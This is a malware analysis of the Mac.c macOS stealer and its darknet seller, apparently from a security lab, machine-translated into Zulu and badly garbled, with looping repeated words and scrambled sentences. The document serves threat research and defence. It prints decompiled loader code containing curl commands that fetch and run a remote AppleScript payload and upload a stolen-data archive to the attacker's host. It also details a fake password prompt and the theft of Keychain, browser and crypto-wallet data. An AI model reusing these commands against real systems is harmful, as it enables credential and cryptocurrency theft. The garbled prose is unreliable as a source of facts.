Umlando we-Mac.c stealer akufinyelela isampula esikhulu noma ukuhlangabezana. It kuqala ekugqoka kwezifomu ze-darknet, lapho umbhali we-threats ebizwa ngokuthi 'mentalpositive' wamaqala ukujabulela ukubaluleka nge-set ye-characteristics engaziwayo ezivela kumadivayisi amaningi we-stealer. I-MacPaw, isigaba se-cybersecurity ye-MacPaw, ihamba i-mentalpositive eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni. Ngizokwenzeka ukuthi i-macOS iyahambisana ne-macOS emakethe ye-malware eyenziwe kakhulu kuneminyaka engaphansi eminyakeni yayo ye-Windows, okuhlobisa ukukhula kwe-new wave ye-threat actors abenziwe ubuchwepheshe nangokuthengisa. Ukubuyekezwa Nangona kuphela eminyakeni esidlulile, i-Mac.c iyahambelana nezinsizakalo ezikhulu, ezivamile ezivamile ezivela njenge-stealer operations. . Ngaphandle kokubiza kakhulu kusuka ku-AMOS futhi Ngokuba ama-URL ezingaphezu kuka-command-and-control-infrastructure yayo, i-Mac.c kubonisa ukuba ingxenye ye-ecosystem ephakeme ye-underground eyenza abasebenzisi we-macOS. I-Atomic i-macOS Stealer Isikhunta4 Okufakiwe futhi yi-methodical ne-transparent approach to building in public. 'mentalpositive' izivakashi ezivakashi ezivakashi kanye namakhasimende ezivakashiwa ku-Mac.c builds - izinga lokuvakashiwa emangalisayo ehlabathini enhle ye-macOS development malware. Kule nqaku, sincoma ukuguqulwa kwe-Mac.c, ukuguqulwa kwezinto ze-mentalpositive, futhi ukubuyekeza kanjani le-stealer ifakwe emkhakheni okwengeziwe we-threats eyenza i-Apple platforms. Umdlali omusha emakethe Okungenani izinyanga ezedlule, i-Moonlock Lab wabhala ukusuka ku-Mac.c stealer futhi wabhala umenzi ngaphansi kwe-alias 'mentalpositive'. Le umdlavuza we-threat actor wahlala phakathi kwezigidi eziningana ezintsha ezivela emakethe ye-macOS malware, indawo engaphansi kakhulu etholakalayo kunezinto ze-Windows-targeting malware. Ngokusho namanye ama-threat actors, 'mentalpositive' usebenzisa izimpendulo ezintsha ezivela ekuthuthukiseni i-malware: isakhiwo se-modular ekusetshenziswa kwezinkampanini ezahlukile, izindlela ezihlangene ze-obfuscation, kanye nezinhlangano ezinzima ezinzima ze-command-and-control (C2). Kodwa-ke, i-profile yama-target kanye ne-data exfiltration yama-Mac.c ye-mentalpositive ibonise. I-iCloud Keychain i-credentials, i-passwords e-browser, ama-crypto wallets, ama-metadata ye-system, futhi ngisho amafayela ezivamile ezivela emaphandleni e-macOS - konke ngokusebenzisa ama-credentials eyenziwe nge-phishing. Ngokuvumelana ne-standard system APIs kanye nezindlela zokuxhumana ezivela emaphandleni, ivimbela ama-endpoint defenses ezivamile. Ukwakhiwa kwePublic Ngaphansi kwezobunjiniyela zobuchwepheshe, 'mentalpositive' ibonise ukwelashwa okungenani emhlabeni darknet forums. Ngaphansi kweminyaka eminyakeni ezingu-mashumi, lokhu umdlavuza umdlavuza usebenzisa i-underground forum ukunikezela ukuhlaziywa kwama-Mac.c, ukuxhumana nabasebenzisi ezithakazelisayo, futhi ngempumelelo ngokuphendula. Ukubuyekezwa okuhlobene kunokukwazi ukwandisa ukubuyekeza kanye nokuvimbela ukufinyelela kwimarike okuhlobene. Lezi zibonisa ukwakha isakhiwo se-custom stealer-as-a-service model yebhizinisi esihlobene ngokugcwele ku-macOS threat niche. I-screenshots ezilandelayo ibonisa ukuthi izicelo zofomu zihlala ngokushesha njengezinsizakalo ezintsha. Njengoba izihloko ezijwayelekile ziye zithunyelwe e-Russian, sinikeza isifundo esifushane ngamunye. I-screenshots yokuqala ibonisa i-advertisement yokuqala enikeza ukubhaliswa kwe-stealer updates ngenyanga we-1,500 USD. Ngemuva kwalokho, 'mentalpositive' wahlanganyela umbhalo oluthile we-Mac.c features. Ngokuvamile kwabo, ezinye izibuyekezo emangalisayo zihlanganisa: ukuguqulwa kwe-Ledger Live app yokuqala, ukunciphisa ubukhulu be-binary ye-file (for a faster download and potentially less detectable artifacts through static analysis), futhi optimization ye-admin panel. Ngokuvamile, i-panel ibheka kwi-web-based interface yama-clients 'mentalpositive', amaklayenti we-Mac.c stealer. It ivumela kwabo ukukhiqiza ama-malware builds, ukucubungula ama-infections (kuquka ama-successful kanye nama-failed attempts), kanye nokulawula amanye ama-campaign details. Njengoba kubhalwe ngaphambi, 'mentalpositive' usebenza ngokushesha ukuhlaziywa kwedivayisi zabo ukuze akuyona amakhasimende ezikhuthazayo ngokuvumela ukuthi ukuthuthukiswa kunazo. Ngezansi isibonelo yokushintshwa okufanayo, lapho umngcele we-threatener uthola ukuhlola inguqulo olusha le-macOS versions ngaphansi kwe-10.12.6. I-post kunezihlanganisa izindlela zokuxhumana ezokufinyelelwa, nge-links ku Tox, futhi Jabber. Ukubuyekezwa Futhi lokugqibela, umbhalo wokuqala ngesikhathi sokubhalisa izibuyekezo ezengeziwe. Lezi zihlanganisa ukuchithwa kwe-XProtect ngokuvimbela izakhiwo ezizodwa ukusuka kwangaphakathi, isithombe esikhulu se-browsers asekelwe, ukulungiswa kwe-file grabber ngokusebenzisa i-control panel, futhi ikakhulukazi i-module eyahlukile ye-phishing ye-Trezor seed phrases. Ngokufanayo ne-Ledger Live module, le nkqubo entsha iyatholakala nge-akhawunti eyengeziwe ye-$1,000. Imininingwane nge-AMOS Kubaluleke, ezinye abaphakeli emangalisayo abalandeli abalandeli abalandeli ngokuvumelana ne-Mac.c code, okuvumela ukuba ingaba inguqulo oluthile ye-Atomic macOS Stealer. I-Moonlock Lab i-analyzed ne-payloads ezidlulile ze-both stealers, futhi i-AMOS ifakwe ngokugqithisileyo ku-AMOS. Uma amabili amasethi amahhovisi elifanayo, umsebenzi eyenziwe nge 'mentalpositive' kuyinto enhle kakhulu. Lokhu kubonisa noma ikhodi yokuthumela okuqondile noma ukuguqulwa kwelanga. Olandelayo: One of our recent articles (Ukuhlukaniswa nge-red color) AMOS SHA256: 54b9576aad25d54d703adb9a26feaa5d80f44b94731ff8ecff7cf1ebc15cf3ff Okokuqala ukubukeka emangalisayo: 2025-06-19 20:18:55 ' (Ukuhlaziywa nge-green color) mentalpositive SHA256: 7dfd77f09a90d8d01a7d74a84685645622ae87a90b5dd72a5750daac9195c467 Okokuqala ukubukeka emangalisayo: 2025-07-01 15:41:49 Ukubuyekezwa okuhlobene kubonisa ukusetshenziswa okuphakeme kwe-code e-function-level phakathi kwe-Mac.c ne-Atomic macOS Stealer. Kwiimeko ezithile, izicelo zibonakalisa ukuthi ziye zithunywe ngempumelelo noma nge-modification ezincinane, okuvumela ukuba isakhiwo se-development esihlalweni noma isakhiwo se-coding esizayo. Ngokuvamile, izimboni ezimbili zihlanganisa isakhiwo esifanayo esebenzayo yokuthintela idatha ephelele ku-macOS izinhlelo. Kwiimeko ezimbili, lezi zokusebenza ngokusebenzisa izixhobo ze-macOS ezisebenzayo kanye ne-scripting, ukunciphisa ukuxhaswa kwe-external kanye nokuphucula ukuxhaswa. Ithebula elandelayo ibonisa izici ezahlukile: Ngaphandle kwe-internals ezahlukile, i-AMOS ibonise izinzuzo ezithakazelisayo zokusebenza, i-modularity, ne-targeting. Ithebula elandelayo ibonise izici ezizodwa ngamunye: Nangona i-Mac.c isebenza njenge-compact, non-persistent AppleScript-based stealer, i-Atomic macOS Stealer inikeza ingozi enhle, enhle, futhi ye-modular ye-design philosophy efanayo. Ukusebenza okuphakeme kwe-coding kunikeza imibuzo ebalulekile mayelana nokuthintela, ukufinyelela kwe-builder, kanye nokuxhumana okungagunyaziwe ngaphakathi kwezinkimbinkimbi ze-macOS zokusebenza kwe-malware. Nakuba isixhobo se-"mentalpositive" ingaba engaphansi, akuyona enhle kakhulu - futhi i-AMOS ibekwe inguqulo enhle futhi enhle kakhulu yokuthintela ebonakalayo ebonakalayo namhlanje. Indlela Mac.c stealer ukusebenza Ngaphezu kwalokho, kubhalwe Ngaphezu kwalokho, indawo yayo yokusebenza ayikho ukuguqulwa: https://lagkill[.]cc. It inikeza amafayela we-PHP ezisetshenziselwa ukucubungula ama-victims kanye nezinye izinhlelo zokuhamba. 'mentalpositive' Umhlahlandlela we-Moonlock Lab Kuleli khasi lihlanganisa amafayela eziningana ze-Mach-O, kodwa ngokuvamile i-workflow ingahlukaniswa eminyakeni angu-2: Mach-O yokusebenza okokuqala kanye ne-AppleScript payload. Isigaba 1: Mach-O yokuqala executable I-Mac.c stealer isetshenziselwa isinyathelo eziningi sokusebenza, lapho isinyathelo sokuqala isebenza njenge-loader elula esebenzayo yokusebenza okufakiwe, ukwelashwa kwe-environmental, kanye nokuthumela okulawulwa kwe-payload esilandelayo. Ngezansi kuyinto ukucubungula okwengeziwe kulesi isinyathelo, esekelwe ku-reverse engineering ye-sample 90309fc3b901df1d7b6d7b6d747c5afa63fca6262721ce39c34da4b13901d53b919a3. undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } Mac.c input point (entry()) uqala nge forking inqubo yamanje nokwenza isitimela entsha nge setsid(), ngokuvamile i-daemonizing. Lokhu kuvimbela i-malware kusuka kumadokhumenti ye-controller futhi ivumela ukuba isebenze emkhakheni. Ngaphezu kwalokho, sincoma umsebenzi esisodwa esihlanganisa zonke inguqulo, output, futhi inguqulo inguqulo /dev/null usebenzisa freopen(). Lokhu ukunciphisa i-console output okuyinto ingangena ukuphazamiseka ku-debug logs noma i-terminal monitors. I-malware i-hardcodes i-command-and-control (C2) domain njenge: lagkill[.]cc. It ikhiqiza idivayisi elilodwa ye-victim ngokuvumelana nezinyango ezingu-hexadecimal ezingu-static. Lokhu kuholela ku-txd token ye-pseudo-unique, esetshenziselwa ukucindezeleka kwe-fingerprint ye-host eyenziwe noma ukucindezeleka ama-infection batches ngesikhathi se-C2 ukuxhumana. Isinyathelo esiyingqayizivele kulesi isinyathelo sokufaka nokuthumela i-AppleScript ekhukhwini. Lokhu kufinyelelwa nge-chaining curl ne-osascript ukulanda nokuthumela i-payload ngokushesha: curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript Uhlelo le-attacker ivumela ukuhlaziywa kwe-payload ngokushesha ngaphandle kokuguqulwa kwe-loader, okuvimbela ukuxhumana ngenxa ye-direct execution path. Ngemva kokufaka i-AppleScript (eyenza ukuchitha idatha e-local), i-loader ikhohlisa ukuthuthukiswa kanye nokushintsha ifilimu le-ZIP kwebhizinisi le-C2 efanayo: curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/ Ukulethwa lokhu kusetshenziselwa ukulethwa ezisebenzayo (cl: 0) kanye ne-timeout enobuningi ukuhlangabezana nezinhlelo ezincinane, okuvumela ukucindezeleka ngokucindezeleka ku-operational stability. Isigaba 2: AppleScript payload Isinyathelo sesibili se-Mac.c stealer kuyinto lapho ukuphazamiseka okuqala. Umthamo we-AppleScript inikeza izinzuzo ze-macOS yokufakelwa zokufaka idatha ezithakazelisayo. Ngokuvamile, inikeza lokhu ngaphandle kokuphuma ama-binary efakwe noma inikezela izinzuzo eziholile futhi i-password ye-phishing iyatholakala. Ngezansi, thwebula izindlela ze-payload ye-stage yesibili ngesigaba. Credential theft & CLI abuse I-script ivula i-fake system prompt enikezela i-password ye-username. Lokhu kubhalwe ku-plaintext futhi isetshenziswe ngemva. Ngemuva kwalokho, it silungiselela i-Security CLI utility ukunikela iziqinisekiso ezihlaziywa kusuka ku-Keychain, ngokuvamile zihlanganisa i-Google Chrome ne-Chromium-based apps. Imininingwane ezivela ku /tmp /<random> / Password. Kuyinto phishing tactics usebenzisa ibhizinisi native nokufundisa macOS ukubuyekeza ukubuyekeza abasebenzisi. Akukho ikhodi yokubhalisa noma ukucindezeleka izincwadi ezidingekayo. Browser and extensions data theft Izibuyekezo ezivamile zihlanganisa Chrome, Edge, Brave, futhi Yandex. Izifayile ezithunyelwe zihlanganisa: idatha lokubhalisa, cookies, idatha web, ukugcina IndexedDB. Okokuqala, i-script itheres ngokusebenzisa amakhulu ama-crypto wallet eyaziwayo - njenge-MetaMask, i-Phantom, ne-Binance Wallet - futhi iveza amafayela ze-storage zendawo noma ama-session artefacts. Zonke iziphakamiso ezinxulumene ne-browser zihlanganiswe ngaphansi /tmp/<random>/Browsers/. Hot wallet and crypto app harvesting I-PayLoad scans for the presence of popular desktop crypto wallets, kuhlanganise: Ukuhlobisa ekhaya Ngena ngemvume Ukuhlobisa Ngena ngemvume Waze I-Ledger Live Imininingwane asebenzayo, njenge-wallet files kanye ne-configuration databases (isib. i-LevelDB directories) zihlanganiswe ku- /tmp/<random>/Cryptowallets/. Ngokuvamile, i-crypto-enthusiastic isebenza ngokuvumelana ne-crypto-enthusiastic base. File-grabber and its logic Ukuze ukwandisa i-Intelligence Value kanye nokunciphisa i-Footprint, i-script isebenza kulandelayo: I-Recursively searches ifolda ye-Desktop, i-Documents, neDownload ye-user. I-Filters ye-high value file types: .wallet, .seed, .txt, .keys, .pdf, .docx. Ukuvimbela usayizi ifayela limit ~10MB. Ngokuvamile, i-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti ye-akhawunti. Collection of messaging and app artifacts I-Mac.c ikhophi ifolda le-tdata, okuyinto ingatholakala ama-session tokens asebenzayo noma ama-messages e-cache (ama-messages ehlanganisiwe ne-Telegram). I-configuration files kusuka ku-Binance neTon Keeper izinhlelo zithunyelwe futhi inikeza ukubuyekeza kokusebenzisa i-wallet, imibala ye-login, noma ama-keys ezihlaziywa. Ukusetshenziswa kwe-system_profiler ukuthatha idatha ye-hardware, macOS, kanye ne-displays. Ukubuyekezwa okuhlobene kuboniswa kwebhizinisi lomsebenzisi, futhi akuyona kuphela ama-assets. Archiving and exfiltration Konke idatha etholakalayo etholakalayo etholakalayo etholakalayo etholakalayo /tmp/<random>/. Ngokusebenzisa ditto -c -k, isixhobo se-archiving ye-macOS, ithebula yonke ifomu ku- /tmp/osalogging.zip. Ngemva kokufaka, i-payload isixazululwa. Akukho ukubhuka kwebhizinisi noma ukulethwa okuguqulwa. Kuyinto stealth-focused, umklamo ephemeral ibonisa isebenzo fast-smash-and-grab, ngokuvamile ethandwa ukusetshenziswa esisodwa ukusetshenziswa noma njengoba ingxenye ye-infection ketheyili. Phishing Ukusebenza Uma ubuchwepheshe esithakazelisayo esetyenziswe ku-"mentalpositive" ye-payload yesibini esihlanganisa i-system fake prompt eyenziwe njenge-game permission request. Ngokuvamile, i-Mac.c ibiza isithombe se-AppleScript esithakazelisayo enikezela kubasebenzisi ukuyifaka i-macOS login password yayo ukuze "ukuvumela umdlalo Ukubuyekeza i-akhawunti yakho Izingubo ezingenalutho Ngaphezu kwalokho, lezi zokusebenza zihlanganisa ne-build tag 'innocent' (noma, ngezinye izimo, 'innocent'), okungenani zisetshenziselwa ukucacisa ama-infections ezihambisana ne-campaign eyodwa. Okokuqala, idolobha okwenziwe ngokuvamile ku-inocentwitches[.]top. Nangona i-root URL inikeza ku-Google, kunezinto zihlanganisa isitimela se- /upload.php, okuvumela umngcele we-threatener ukuthola idatha eyenziwe. Imibuzo Njengoba ama-Mac amakhompyutha asebenza ngokushesha ngokushesha phakathi kwamakhasimende amakhulu futhi kubathengi be-cryptos ikakhulukazi, sincoma ukuba ama-stealers akuyona kuphela kwezidingo zabo, kodwa ku-market share kanye ne-impact. I-Mac.c ayikho isibonelo esisodwa, kodwa ingxenye ye-trend esikhulu ekuthuthukiseni ukuthuthukiswa kwe-macOS malware. Nangona kusetshenziselwa izici ezizodwa nezinhlelo zokusebenza nezakhiwo ezivamile ze-Atomic Stealer, kusetshenziselwa ukunambitheka kwezimpahla ze-macOS futhi zihlanganisa ngezinyathelo ezithile. Yini singathanda ukwakhiwa kwimodeli entsha yebhizinisi: stealer-as-a-service, eyenzelwe ikakhulukazi kubasebenzisi macOS kanye nokuhlukaniswa kwebhizinisi elikhulu ye-malware-as-a-service. Nangona i-Atomic Stealer ibhizinisi engaziwa kakhulu, kungenzeka ukuthi kuneminyaka eminyakeni kuphela lapho abaculi amabili amasha abasebenzisa imithi yayo ukukhiqiza umkhiqizo we-malware enhle futhi enhle kakhulu. ikhaya https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php 7dfd77f09a90d8d01a7d74a84a685645622ae87a90b5dd72a5750daac9195c467 33e9b605406ffb779dc912a1ce66436a8867b88e087bc34b2b2b2fca2160b64ca7 I-57b86903c46cf45c968aa9618c0a45eb135e05b24c13c0d27442d4387de37319 Ukulungiselela Imininingwane Imininingwane Imininingwane Imininingwane Imininingwane Imininingwane Imininingwane Imininingwane Imininingwane Imininingwane